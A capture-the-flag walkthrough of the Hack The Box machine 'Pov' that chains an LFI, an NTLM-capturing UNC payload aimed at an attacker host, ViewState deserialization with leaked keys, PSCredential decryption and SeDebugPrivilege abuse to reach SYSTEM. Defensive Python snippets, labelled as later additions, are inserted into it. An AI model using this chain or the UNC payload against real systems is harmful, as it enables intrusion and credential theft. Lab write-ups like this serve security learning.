
🟨POV

IP: 10.10.11.251 - Platform: Windows - Difficulty: Medium

RECON

Nmap

nmap reveals that only port 80 is open, which is a little unusual for an HTB machine. Most boxes also expose port 22 (SSH) as the way to get remote access as a user or root, so the usual approach is to grab credentials by some nefarious means and then log in over SSH.


map -sV -sC -v -T4 10.10.11.251

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: pov.htb
|_http-server-header: Microsoft-IIS/10.0
|_http-favicon: Unknown favicon MD5: E9B5E66DEBD9405ED864CAC17E2A888E
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

FFUF

Using ffuf to search for subdomains (virtual hosts) that respond differently, i.e. with a 200 or 300-series status code:

Only one subdomain returns 302: dev. Let's add dev.pov.htb to /etc/hosts.

GAINING FOOTHOLD

Image taken from dev.pov.htb

pov.htb provides no indication of a possible attack vector. However, on dev.pov.htb I stumbled upon an LFI (Local File Inclusion) while examining the parameters of the request intercepted in Burp Suite as I tinkered with the site's download function.


A File Inclusion vulnerability allows an attacker to include a file, usually by exploiting a "dynamic file inclusion" mechanism implemented in the target application. The vulnerability occurs because user-supplied input is used without proper validation.

This can lead to something as simple as outputting the contents of a file, but depending on the severity it can also lead to:

  • Code execution on the web server

  • Code execution on the client-side such as JavaScript which can lead to other attacks such as cross site scripting (XSS)

  • Denial of Service (DoS)

  • Sensitive Information Disclosure

Jackpot!
Finding interesting data when navigating back to the machine's hosts file

It took some time to find a few intriguing files:

  • default.aspx

  • web.config

  • contact.aspx

LFI & Responder

Next, we use the LFI together with Responder to capture an NTLM hash.


Responder poisons mDNS, NBT-NS and LLMNR. You might be asking:

What are LLMNR, NBT-NS and mDNS? The three protocols serve nearly identical purposes.

  • LLMNR (Link-Local Multicast Name Resolution) is based on the DNS packet format; it supports all current and future DNS formats, types and classes, and works for both IPv4 and IPv6 hosts.

  • NBT-NS (NetBIOS Name Service) is a NetBIOS protocol used on Windows to resolve NetBIOS names to IP addresses.

  • Finally, mDNS (Multicast Domain Name Service) addresses all participants on the local network directly via multicast.

If reading this is too tedious for you, just know that Responder tries to capture the NTLM hashes sent over the network. If you're lucky, the tool may even hand you a clear-text username and password in addition to the password hash.

Crafting a payload for Responder to catch!

file=%5C%5C10.10.X.X%5Csomefile

Our payload is simply \\10.10.X.X\somefile wrapped in URL encoding: a UNC path pointing at our own host, so the server tries to authenticate to it and Responder catches the exchange.

And this is a dead end, because the captured hash does not crack. :<
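The defender's counterpart to the file parameter abused above, as an added example that is not part of the original writeup or the box: a validator for a download parameter that rejects UNC paths (the \\10.10.X.X\somefile trick that makes IIS authenticate outbound), traversal, drive letters and anything that is not a bare, allowlisted file name under a fixed folder. The download root and extension list are assumptions.

```python
from pathlib import PureWindowsPath
from typing import Tuple
from urllib.parse import unquote

# Assumed download root and allowlisted extensions (not values from the box).
DOWNLOAD_ROOT = PureWindowsPath(r"C:\inetpub\dev\downloads")
ALLOWED_EXT = {".pdf", ".png", ".jpg", ".txt"}


def validate_download_name(raw_value: str) -> Tuple[bool, str]:
    """Validate the raw (URL-encoded) value of a 'file' parameter.

    Returns (accepted, reason_or_path). Only a bare file name with an
    allowlisted extension that sits directly under DOWNLOAD_ROOT is accepted.
    """
    value = unquote(raw_value)  # the request carries %5C for '\'
    if not value or "\x00" in value:
        return False, "empty name or null byte"
    # A UNC path (\\host\share) would make the IIS worker process open an
    # outbound SMB session and hand its NetNTLM response to that host.
    if value.startswith(("\\\\", "//")):
        return False, "UNC path rejected"
    if "\\" in value or "/" in value:
        return False, "path separator rejected"
    if ":" in value:
        return False, "drive letter or alternate data stream rejected"
    candidate = DOWNLOAD_ROOT / value
    # pathlib does not normalise '..', so anything that is not a direct child
    # of the root fails this check as well (belt and braces).
    if candidate.parent != DOWNLOAD_ROOT or candidate.name != value:
        return False, "name does not resolve directly under the download root"
    if candidate.suffix.lower() not in ALLOWED_EXT:
        return False, f"extension {candidate.suffix!r} not allowlisted"
    return True, str(candidate)
```

Note that a bare web.config is rejected too, purely by the extension allowlist, which is what would have stopped the configuration read in the next section.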

ViewState Deserialization Exploit

An overview of the approach

Taking a look at web.config reveals some juicy info

So let's talk about ViewState for a little bit:

The ASP.NET framework's default method for maintaining page and control values across web pages is called ViewState. The current state of the page and any values that must be kept during postback are serialized into base64-encoded strings and output in the ViewState hidden field or fields when the HTML for the page is rendered.

ViewState by itself isn't the problem. The issue lies in how ASP.NET creates and processes ViewState using ObjectStateFormatter for serialization and deserialization: the serialized data is protected by ASP.NET's encryption and signature, and if those are compromised, the deserialization step can be abused.

Attackers who obtain the keys (or know the algorithms in use) can craft malicious payloads that imitate authentic ViewState and exploit deserialization flaws in ObjectStateFormatter.

-> In this case, we can leverage the encryption and signature keys leaked from the web.config file.

A list of scenarios where ViewState Deserialization flaws could be exploited

Luckily, the .NET deserialization tool ysoserial includes a ViewState-specific plugin. It uses the known keys and algorithms to forge ViewState that carries a valid signature and encryption, so that ObjectStateFormatter deserializes the attacker's payload.
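As an added, defender-side example (not from the writeup or the box): a small audit of the ViewState-relevant settings in a web.config of the kind leaked above. The sample config and its key values are constructed placeholders; the audit flags static machineKey material (exactly what made the ysoserial approach possible), weak validation algorithms, and MAC or encryption being switched off.

```python
import xml.etree.ElementTree as ET
from typing import List

# Constructed sample in the shape of an ASP.NET web.config with a static
# machineKey. The key values are placeholders, not the keys from the box.
SAMPLE_WEB_CONFIG = """<configuration>
  <system.web>
    <customErrors mode="On" />
    <machineKey validationKey="PLACEHOLDER_VALIDATION_KEY_HEX"
                decryptionKey="PLACEHOLDER_DECRYPTION_KEY_HEX"
                validation="SHA1" decryption="AES" />
    <pages enableViewStateMac="true" viewStateEncryptionMode="Auto" />
  </system.web>
</configuration>
"""

WEAK_VALIDATION = {"md5", "sha1"}


def audit_web_config(xml_text: str) -> List[str]:
    """Return a list of ViewState-related findings for one web.config."""
    findings = []
    root = ET.fromstring(xml_text)
    mk = root.find("./system.web/machineKey")
    if mk is not None:
        for attr in ("validationKey", "decryptionKey"):
            # Absent attribute means the framework default, AutoGenerate.
            if not mk.get(attr, "AutoGenerate").startswith("AutoGenerate"):
                findings.append(f"static {attr} stored in web.config: any file read "
                                f"(LFI, backup, repo leak) lets a client forge ViewState")
        # HMACSHA256 is the .NET 4.x default when the attribute is absent.
        if mk.get("validation", "HMACSHA256").lower() in WEAK_VALIDATION:
            findings.append(f"weak validation algorithm {mk.get('validation')}; "
                            f"use HMACSHA256 or stronger")
    pages = root.find("./system.web/pages")
    if pages is not None:
        if pages.get("enableViewStateMac", "true").lower() == "false":
            findings.append("enableViewStateMac=false: ViewState is deserialized "
                            "without any MAC check")
        if pages.get("viewStateEncryptionMode", "Auto").lower() == "never":
            findings.append("viewStateEncryptionMode=Never: ViewState contents are "
                            "readable by any client")
    return findings
```

A static-key finding means the keys must be rotated once leaked; keeping the section encrypted with aspnet_regiis -pe "system.web/machineKey" limits what a plain file read exposes.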

Cracking the nut

With ASP.NET framework ≥ 4.5, we need to supply the decryption algorithm and the decryption key to the ysoserial:

Crafting a serialized payload

In this example, we will be using a simple PowerShell Reverse Shell encoded in Base64:

Then, serialize it with ysoserial:

Finally, after replacing the value of __VIEWSTATE in the request shown above with the URL-encoded generated payload, our payload is executed.

Plug-in our payload!

Now, we have gained a shell as POV\sfitz

Got da shell!!

PRIVILEGE ESCALATION

Enumeration

Getting the users' SIDs:

So sfitz lacks the privilege to read the user flag; perhaps alaading has it?

After a bit of exploring, I found this file:

Stumble upon a PSCredential file

Password, Pa$$w0rd, P455w0rd!!!

Can I access the password directly from the PSCredential object?

  • As you can see, it’s stored as a secure string.

  • The password will not be returned to you in plain text by $cred.Password.

  • As opposed to a plain-text password, $cred.Password | ConvertFrom-SecureString will ONLY give you the encrypted cipher data.

The PSCredential object exposes the GetNetworkCredential() method, which can be used to decrypt the password stored in the object.

When I invoke this method and run Get-Member on the result, it lists the properties of the returned object, and one of them is called Password. Running $cred.GetNetworkCredential().Password returns the password in plain text.

We could also parse it directly from the XML:

Using the recovered credential, we use a PowerShell script to trigger a reverse shell:

Boom?!

Now we are alaading

Gaining shell as Administrator

Checking the privilege of POV\alaading:

Understanding SeDebugPrivilege

By itself, SeDebugPrivilege gives a process the ability to view and modify the memory of other processes. It grants the token bearer access to any process or thread, regardless of their security descriptors.


It's important to remember that attackers frequently enable this privilege in order to gain greater access to thread and process objects. Many C2 agents come with built-in code that allows you to do this instantly. Because it allows the creation of new remote threads in a target process, malware also takes advantage of this privilege to perform code injection into otherwise trustworthy processes.

As we can see on this machine, alaading does not have SeDebugPrivilege enabled. To get around this, we can bring in RunasCs.

RunasCs is a tool that lets you run a particular process with explicit credentials, so that it gets permissions different from what our current shell provides.

As you can see below, RunasCs enables a list of privileges for a specific security token.

We would use it to spawn another shell:

Catch it with nc:

Getting a new shell with RunasCs

Checking the privilege info again reveals a surprising discovery:

With SeDebugPrivilege enabled, we can upload a Meterpreter shell to the machine and leverage it to gain access as Administrator.

Crafting our payload

To get the payload onto the target, host it with Python's http.server and then fetch it with:

Finally, execute it by:

And voilà!!

We got the shell.

Now, one of the oldest tricks in the book is to migrate into another Windows process:


There are many cases where you need to "migrate" a specific Windows process, typically a shell:

  • An unstable shell.

  • Migrate from a 32-bit process to a 64-bit process.

  • Dealing with exploits that require an interactive session.

This is easy if you have a Meterpreter shell: launch the "migrate" command with the target PID and wait for the migration to complete. Technically this is closer to code injection than a true migration, since it works by creating a thread inside another process, and Meterpreter is exceptionally good at it: it creates a new remote thread in the target and injects your current session into it, along with all of your loaded extensions and configuration.

By migrating into a more privileged process, we should be able to become NT AUTHORITY\SYSTEM:

Lastly, take the PID and let Meterpreter handle everything:

Avada Kedavra 🎉


It is also possible to migrate into winlogon or explorer.

There is also a port listening on localhost only, so another approach is to port-forward with chisel and then use evil-winrm (or Cobalt Strike, Sliver, Havoc C2).

H4v3 fun ^^
